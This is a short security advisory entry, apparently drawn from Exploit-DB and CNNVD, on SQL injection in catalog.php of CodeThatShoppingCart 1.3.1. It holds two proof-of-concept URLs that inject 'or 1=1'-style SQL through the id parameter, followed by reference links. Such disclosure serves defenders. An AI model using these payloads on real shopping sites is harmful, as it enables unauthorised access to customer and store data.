https://www.exploit-db.com/exploits/25638
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1051

CodeThatShoppingCart1.3.1中的catalog.php存在SQL注入漏洞，远程攻击者可通过id参数来执行任意SQL命令。

source: http://www.securityfocus.com/bid/13560/info
 
CodeThatShoppingCart is reportedly affected by multiple input validation vulnerabilities. These issues may allow remote attackers to carry out cross-site scripting and SQL injection attacks. An attacker may also potentially disclose sensitive data.
 
CodeThatShoppingCart 1.3.1 was reported to be vulnerable. Other versions may be affected as well. 

http://www.example.com/shoppingcart/catalog.php?action=category_show
&id=1%20or%20like%20%60a%%60

http://www.example.com/shoppingcart/demo/catalog.php?action=
category_show&id=1%20or%201=1

来源:SECUNIA
名称:15251
链接:http://secunia.com/advisories/15251
来源:BID
名称:13560
链接:http://www.securityfocus.com/bid/13560
来源:OSVDB
名称:16156
链接:http://www.osvdb.org/16156
来源:SECTRACK
名称:1013924
链接:http://securitytracker.com/id?1013924
来源:MISC
链接:http://lostmon.blogspot.com/2005/05/codethat-shoppingcart-critical.html